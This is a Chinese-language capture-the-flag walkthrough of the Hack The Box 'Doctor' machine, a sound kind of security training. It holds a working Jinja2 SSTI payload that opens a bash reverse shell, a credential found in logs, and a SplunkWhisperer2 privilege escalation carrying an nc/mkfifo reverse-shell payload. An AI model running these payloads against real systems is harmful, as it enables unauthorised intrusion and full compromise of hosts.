信息收集
| IP Address | Opening Ports |
|---|---|
| 10.10.10.209 | TCP:22,80,8089 |
$ nmap -p- 10.10.10.209 --min-rate 1000 -sC -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 59:4d:4e:c2:d8:cf:da:9d:a8:c8:d0:fd:99:a8:46:17 (RSA)
| 256 7f:f3:dc:fb:2d:af:cb:ff:99:34:ac:e0:f8:00:1e:47 (ECDSA)
|_ 256 53:0e:96:6b:9c:e9:c1:a1:70:51:6c:2d:ce:7b:43:e8 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Doctor
|_http-server-header: Apache/2.4.41 (Ubuntu)
8089/tcp open ssl/http Splunkd httpd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after: 2023-09-06T15:57:27
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: splunkd
|_http-server-header: Splunkd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
SSTI
![[Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升插图](https://img.4awl.net/img/16/cb9feaf8a192ca36bbd25d6680a5ae.jpg "[Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升插图")
# echo '10.10.10.209 doctors.htb'>>/etc/hosts
$ whatweb http://doctors.htb/login -v
![[Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升插图1](https://img.4awl.net/img/52/e32f6244bf524d6041313409a79b15.jpg "[Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升插图1")
http://doctors.htb/register
![[Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升插图2](https://img.4awl.net/img/a5/daac7c75fadaacba251facf7bb842b.jpg "[Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升插图2")
http://doctors.htb/login
![[Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升插图3](https://img.4awl.net/img/9d/8722b206a5a69e87cc031025ebf623.jpg "[Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升插图3")
http://doctors.htb/post/new
![[Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升插图4](https://img.4awl.net/img/62/4c9cf7a1608111b753da89aa392590.jpg "[Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升插图4")
![[Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升插图5](https://img.4awl.net/img/bb/1f592703af24bce49a41d7053bffc9.jpg "[Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升插图5")
${7*7}
![[Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升插图6](https://img.4awl.net/img/59/4f1dffae6b69cc2c5bb085b388cc61.jpg "[Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升插图6")
http://doctors.htb/archive
![[Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升插图7](https://img.4awl.net/img/95/4d2b90f1cf7b223d71022dd05f4c08.jpg "[Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升插图7")
![[Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升插图8](https://img.4awl.net/img/20/2a79139539baf915bd997f7c451ed0.jpg "[Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升插图8")
{{8*8}}
![[Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升插图9](https://img.4awl.net/img/d5/3e97cbce8a3907e9df1a54b8abba33.jpg "[Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升插图9")
{{9*'9'}}
![[Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升插图10](https://img.4awl.net/img/6e/d395276f2b6cb5cdea8c3c92ce7a81.jpg "[Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升插图10")
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in
x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("bash -c
'bash -i >& /dev/tcp/10.10.16.6/10032 0>&1'").read()}}{%endif%}{%endfor%}
![[Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升插图11](https://img.4awl.net/img/ed/80b4973d87e5db627159936a0d1e9d.jpg "[Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升插图11")
http://doctors.htb/archive
![[Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升插图12](https://img.4awl.net/img/9e/a270ce9e8fb262ba71a8829d280b76.jpg "[Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升插图12")
User 权限
$ grep -R -e 'password' /var/log/ 2>/dev/null
![[Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升插图13](https://img.4awl.net/img/67/627a21ef0b9a696368fd301717c9c4.jpg "[Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升插图13")
username:shaunpassword:Guitar123
$ su shaun
![[Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升插图14](https://img.4awl.net/img/ed/1fa36e3667cdc0267a2ae3d97a82b5.jpg "[Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升插图14")
User.txt
89d2e206dac3a780e4859ba394f419b5
权限提升
$ ps -aux | grep splunk
![[Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升插图15](https://img.4awl.net/img/c3/2cd787a3251e49fac422bd5ab8e466.jpg "[Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升插图15")
$ git clone https://github.com/cnotin/SplunkWhisperer2
$ cd SplunkWhisperer2/PySplunkWhisperer2
$ python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.2 --payload id
![[Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升插图16](https://img.4awl.net/img/75/39f74be0f16a32adf137fb6e76ebd2.jpg "[Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升插图16")
$ python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.16.6 --username shaun --password Guitar123 --payload id
![[Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升插图17](https://img.4awl.net/img/72/dbfced2230d1ceb9b9e514fc8cbf4d.jpg "[Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升插图17")
$ python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.16.6 --username shaun --password Guitar123 --payload 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.6 10033 >/tmp/f'
![[Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升插图18](https://img.4awl.net/img/e8/736ed2daff4e3ad49fa14825e04294.jpg "[Meachines] [Easy] Doctor Python-SSTI+Splunk权限提升插图18")
Root.txt
2f93ef26f3fd15a56c09311850459979
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
